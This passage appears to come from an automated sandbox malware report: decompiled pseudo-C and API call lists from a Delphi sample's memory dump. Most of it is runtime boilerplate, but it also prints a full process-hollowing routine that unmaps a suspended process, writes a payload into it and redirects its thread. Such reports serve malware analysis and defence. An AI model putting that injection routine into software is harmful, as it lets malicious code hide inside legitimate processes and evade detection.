      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
    				void* _t3;
    				void* _t6;
    
    				if(__eax <= 0) {
    					_t6 = 0;
    				} else {
    					_t3 =  *0x41903c(); // executed
    					_t6 = _t3;
    					if(_t6 == 0) {
    						E00402778(1);
    					}
    				}
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
    				void* _t6;
    				intOrPtr _t7;
    
    				_t7 = __edx;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454638 = __eax;
    				 *0x45463c = 0;
    				 *0x454640 = __edx;
    				_t1 = _t7 + 4; // 0x400000
    				 *0x45402c =  *_t1;
    				E00403A70();
    				 *0x454034 = 0; // executed
    				_t6 = E00403B18(); // executed
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
    				intOrPtr _v8;
    				char _v12;
    				CONTEXT* _v16;
    				void* _v20;
    				void _v24;
    				void _v28;
    				long _v32;
    				struct _PROCESS_INFORMATION _v48;
    				struct _STARTUPINFOA _v116;
    				CHAR* _t95;
    				short* _t171;
    				intOrPtr _t182;
    				intOrPtr _t189;
    				intOrPtr* _t194;
    				short* _t196;
    				void* _t197;
    				void* _t199;
    				void* _t200;
    				intOrPtr _t201;
    				void* _t215;
    
    				_t215 = __fp0;
    				_t199 = _t200;
    				_t201 = _t200 + 0xffffff90;
    				_t196 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t199);
    				_push(0x418218);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t201;
    				if(_v12 != 0) {
    					_push(0x418230);
    					_push(_v8);
    					_push(0x41823c);
    					_push(_v12);
    					E00404208();
    				}
    				 *_a4 = 0;
    				_t171 = _t196;
    				if( *_t171 == 0x5a4d) {
    					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
    					if( *_t194 == 0x4550) {
    						E00402B60( &_v116, 0x44);
    						E00402B60( &_v48, 0x10);
    						_v116.cb = 0x44;
    						_v116.dwFlags = 1;
    						_v116.wShowWindow = 0;
    						_t95 = E00404348(_v12);
    						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
    							 *_a4 = _v48.dwProcessId;
    							_v16 = E00417F28( &_v20);
    							if(_v16 != 0) {
    								_v16->ContextFlags = 0x10007;
    								if(GetThreadContext(_v48.hThread, _v16) != 0) {
    									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
    									if( *(_t194 + 0x34) != _v24) {
    										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    									} else {
    										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
    											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
    										} else {
    											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    										}
    									}
    									_t210 = _v28;
    									if(_v28 != 0) {
    										_t197 = E00417EA4(_t196, _t210);
    										_t125 = _v28;
    										if( *(_t194 + 0x34) != _v28) {
    											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
    											 *(_t194 + 0x34) = _v28;
    											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
    										}
    										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
    										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
    										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
    										SetThreadContext(_v48.hThread, _v16);
    										ResumeThread(_v48.hThread);
    										WaitForSingleObject(_v48.hThread, 0xffffffff);
    										_push(_t199);
    										_push(0x4181d0);
    										_push( *[fs:eax]);
    										 *[fs:eax] = _t201;
    										TerminateThread(_v48.hProcess, 0);
    										CloseHandle(_v48.hProcess);
    										_pop(_t189);
    										 *[fs:eax] = _t189;
    									}
    								}
    								VirtualFree(_v20, 0, 0x8000);
    							}
    							if( *_a4 == 0) {
    								TerminateProcess(_v48, 0);
    							}
    						}
    					}
    				}
    				_pop(_t182);
    				 *[fs:eax] = _t182;
    				_push(E0041821F);
    				return E00403EAC( &_v12, 2);
    			}
























    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
    				char* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				struct _WIN32_FIND_DATAA _v334;
    				char _v595;
    				void* _t45;
    				char* _t54;
    				char* _t64;
    				void* _t83;
    				intOrPtr* _t84;
    				char* _t90;
    				struct HINSTANCE__* _t91;
    				char* _t93;
    				void* _t94;
    				char* _t95;
    				void* _t96;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = _v8;
    				_t91 = GetModuleHandleA("kernel32.dll");
    				if(_t91 == 0) {
    					L4:
    					if( *_v8 != 0x5c) {
    						_t93 = _v8 + 2;
    						goto L10;
    					} else {
    						if( *((char*)(_v8 + 1)) == 0x5c) {
    							_t95 = E00404DF4(_v8 + 2);
    							if( *_t95 != 0) {
    								_t14 = _t95 + 1; // 0x1
    								_t93 = E00404DF4(_t14);
    								if( *_t93 != 0) {
    									L10:
    									_t83 = _t93 - _v8;
    									_push(_t83 + 1);
    									_push(_v8);
    									_push( &_v595);
    									L00401248();
    									while( *_t93 != 0) {
    										_t90 = E00404DF4(_t93 + 1);
    										_t45 = _t90 - _t93;
    										if(_t45 + _t83 + 1 <= 0x105) {
    											_push(_t45 + 1);
    											_push(_t93);
    											_push( &(( &_v595)[_t83]));
    											L00401248();
    											_t94 = FindFirstFileA( &_v595,  &_v334);
    											if(_t94 != 0xffffffff) {
    												FindClose(_t94);
    												_t54 =  &(_v334.cFileName);
    												_push(_t54);
    												L00401250();
    												if(_t54 + _t83 + 1 + 1 <= 0x105) {
    													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
    													_push(0x105 - _t83 - 1);
    													_push( &(_v334.cFileName));
    													_push( &(( &(( &_v595)[_t83]))[1]));
    													L00401248();
    													_t64 =  &(_v334.cFileName);
    													_push(_t64);
    													L00401250();
    													_t83 = _t83 + _t64 + 1;
    													_t93 = _t90;
    													continue;
    												}
    											}
    										}
    										goto L17;
    									}
    									_push(_v12);
    									_push( &_v595);
    									_push(_v8);
    									L00401248();
    								}
    							}
    						}
    					}
    				} else {
    					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
    					if(_t84 == 0) {
    						goto L4;
    					} else {
    						_push(0x105);
    						_push( &_v595);
    						_push(_v8);
    						if( *_t84() == 0) {
    							goto L4;
    						} else {
    							_push(_v12);
    							_push( &_v595);
    							_push(_v8);
    							L00401248();
    						}
    					}
    				}
    				L17:
    				return _v16;
    			}




















    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
    				char _v11;
    				char _v16;
    				intOrPtr _t28;
    				void* _t31;
    				void* _t33;
    
    				_t33 = __eflags;
    				_v16 = 0;
    				_push(_t31);
    				_push(0x40b318);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t31 + 0xfffffff4;
    				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
    				E004040F8( &_v16, 7,  &_v11);
    				_push(_v16);
    				E00407174(7, GetACP(), _t33);
    				_pop(_t28);
    				 *[fs:eax] = _t28;
    				_push(E0040B31F);
    				return E00403E88( &_v16);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
    				char _v260;
    				intOrPtr _t10;
    				void* _t18;
    
    				_t18 = __ecx;
    				_t10 = _a4;
    				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
    					return E00403EDC(_t10, _t18);
    				}
    				return E00403F78(_t10, _t5 - 1,  &_v260);
    			}







    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
    				char _v16;
    				char _t5;
    				char _t6;
    
    				_push(__ecx);
    				_t6 = __ecx;
    				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
    					_t5 = _t6;
    				} else {
    					_t5 = _v16;
    				}
    				return _t5;
    			}







    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00417A70() {
    
    				if( *0x454a18 == 0) {
    					 *0x454a18 = GetModuleHandleA("kernel32.dll");
    					if( *0x454a18 != 0) {
    						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
    						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
    						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
    						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
    						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
    						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
    						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
    						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
    						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
    						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
    						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
    						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
    						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
    						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
    						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
    						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
    					}
    				}
    				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
    					return 0;
    				} else {
    					return 1;
    				}
    			}




    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040CA40() {
    				struct HINSTANCE__* _v8;
    				intOrPtr _t46;
    				void* _t91;
    
    				_v8 = GetModuleHandleA("oleaut32.dll");
    				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
    				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
    				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
    				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
    				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
    				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
    				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
    				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
    				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
    				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
    				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
    				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
    				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
    				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
    				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
    				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
    				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
    				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
    				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
    				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
    				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
    				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
    				 *0x4547f4 = _t46;
    				return _t46;
    			}







    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
    				char _t5;
    				char _t6;
    				CHAR* _t7;
    				char _t9;
    				CHAR* _t11;
    				char _t14;
    				CHAR* _t15;
    				char _t17;
    				CHAR* _t19;
    				CHAR* _t22;
    				CHAR* _t23;
    				CHAR* _t32;
    				intOrPtr _t33;
    				intOrPtr* _t34;
    				void* _t35;
    				void* _t36;
    
    				_t34 = __edx;
    				_t22 = __eax;
    				while(1) {
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L4:
    					if( *_t22 != 0x22 || _t22[1] != 0x22) {
    						_t36 = 0;
    						_t32 = _t22;
    						while(1) {
    							_t6 =  *_t22;
    							if(_t6 <= 0x20) {
    								break;
    							}
    							if(_t6 != 0x22) {
    								_t7 = CharNextA(_t22);
    								_t36 = _t36 + _t7 - _t22;
    								_t22 = _t7;
    								continue;
    							}
    							_t22 = CharNextA(_t22);
    							while(1) {
    								_t9 =  *_t22;
    								if(_t9 == 0 || _t9 == 0x22) {
    									break;
    								}
    								_t11 = CharNextA(_t22);
    								_t36 = _t36 + _t11 - _t22;
    								_t22 = _t11;
    							}
    							if( *_t22 != 0) {
    								_t22 = CharNextA(_t22);
    							}
    						}
    						E00404478(_t34, _t36);
    						_t23 = _t32;
    						_t33 =  *_t34;
    						_t35 = 0;
    						while(1) {
    							_t14 =  *_t23;
    							if(_t14 <= 0x20) {
    								break;
    							}
    							if(_t14 != 0x22) {
    								_t15 = CharNextA(_t23);
    								if(_t15 <= _t23) {
    									continue;
    								} else {
